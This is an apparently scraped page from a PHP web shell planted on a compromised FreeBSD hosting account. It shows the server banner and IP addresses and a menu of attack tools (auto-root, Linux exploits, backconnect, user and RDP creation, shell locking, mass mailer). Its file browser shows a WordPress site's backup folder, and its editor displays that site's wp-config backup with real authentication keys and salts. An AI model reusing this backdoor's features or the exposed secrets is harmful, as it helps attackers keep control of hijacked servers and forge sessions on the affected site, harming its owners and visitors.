FreeBSD s15.mydevil.net 14.1-RELEASE-p4 FreeBSD 14.1-RELEASE-p4 #3 releng/14.1-n267709-86d01789bf41-dirty: Thu Sep 5 04:26:54 CEST 2024 root@pkg1.admin.net.pl:/usr/obj/usr/src/amd64.amd64/sys/devil amd64
Apache/N-G-I-N-X-htaccess-support
: 128.204.218.142 | : 18.118.189.253
Cant Read [ /etc/named.conf ]
?8.1.30
art
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
home /
art /
domains /
rotarycup.pl /
public_html /
wp-content /
backups-dup-lite /
installer /
original_files_91cf224-19190401 /
[ HOME SHELL ]
Name
Size
Permission
Action
142056
2.71
KB
-rw-r--r--
81043
471
B
-rw-r--r--
entries_stored.json
392
B
-rw-r--r--
source_site_htaccess
1004
B
-rw-r--r--
source_site_wpconfig
3.17
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : source_site_wpconfig
<?php /** * The base configuration for WordPress * * The wp-config.php creation script uses this file during the installation. * You don't have to use the website, you can copy this file to "wp-config.php" * and fill in the values. * * This file contains the following configurations: * * * Database settings * * Secret keys * * Database table prefix * * ABSPATH * * @link https://wordpress.org/documentation/article/editing-wp-config-php/ * * @package WordPress */ // ** Database settings - You can get this info from your web host ** // /** The name of the database for WordPress */ define( 'DB_NAME', '' ); /** Database username */ define( 'DB_USER', '' ); /** Database password */ define( 'DB_PASSWORD', '' ); /** Database hostname */ define( 'DB_HOST', '' ); /** Database charset to use in creating database tables. */ define( 'DB_CHARSET', 'utf8' ); /** The database collate type. Don't change this if in doubt. */ define( 'DB_COLLATE', '' ); /**#@+ * Authentication unique keys and salts. * * Change these to different unique phrases! You can generate these using * the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}. * * You can change these at any point in time to invalidate all existing cookies. * This will force all users to have to log in again. * * @since 2.6.0 */ define('AUTH_KEY', 'WEqtW8GJfn2t4Dy3KXXxkTx7lIl5EwCkWyVNDWDO5vvMaqymu3g9nYhmY1qS4QVN'); define('SECURE_AUTH_KEY', 'MO8lQnhrbLgQLz7OLfLEbBWLGeAb3cIOwSaaPIuKfYP29UnqwEbbxGHaYXEn8fM2'); define('LOGGED_IN_KEY', 'RLePAZSssIiXj6QqvjW8MChUpBg8HRDB4dhU80u5cX0mko5ZIfB7JMvLY5PG7px2'); define('NONCE_KEY', 'rzIDivpAjZVZYzDYukr5t8SYGy0S7tuefOu76rUMBlfZkbBsZCj7iM72yPq51tW4'); define('AUTH_SALT', 'ePrf8PXlt80JQWrmdtJkZiCi8fUdbsFqZVMacAnviPRyxQjEyvVEnX5eBho0suQq'); define('SECURE_AUTH_SALT', 'Rd9vmdWnsGJa0xbYkb9xSeIQCag6NL5O5wLGLiUNBso1BrPeXbixqpjMzLrjYWi9'); define('LOGGED_IN_SALT', 'z7c6tse7vKczq6xZX8vaUCSoPCQlfBOpmojmdk1DC7YSopaENbpsdnVclySfg0qK'); define('NONCE_SALT', 'hTfzKI3BfZk6Ot3MIYuZpDe0riw0LXL3XGfE3TrxkDduefrNyyI7lkF7v37AzFG6'); /** * Other customizations. */ define('WP_TEMP_DIR',dirname(__FILE__).'/wp-content/uploads'); /**#@-*/ /** * WordPress database table prefix. * * You can have multiple installations in one database if you give each * a unique prefix. Only numbers, letters, and underscores please! */ $table_prefix = 'wp_'; /** * For developers: WordPress debugging mode. * * Change this to true to enable the display of notices during development. * It is strongly recommended that plugin and theme developers use WP_DEBUG * in their development environments. * * For information on other constants that can be used for debugging, * visit the documentation. * * @link https://wordpress.org/documentation/article/debugging-in-wordpress/ */ define( 'WP_DEBUG', false ); /* Add any custom values between this line and the "stop editing" line. */ /* That's all, stop editing! Happy publishing. */ /** Absolute path to the WordPress directory. */ if ( ! defined( 'ABSPATH' ) ) { define( 'ABSPATH', __DIR__ . '/' ); } /** Sets up WordPress vars and included files. */ require_once ABSPATH . 'wp-settings.php';
Close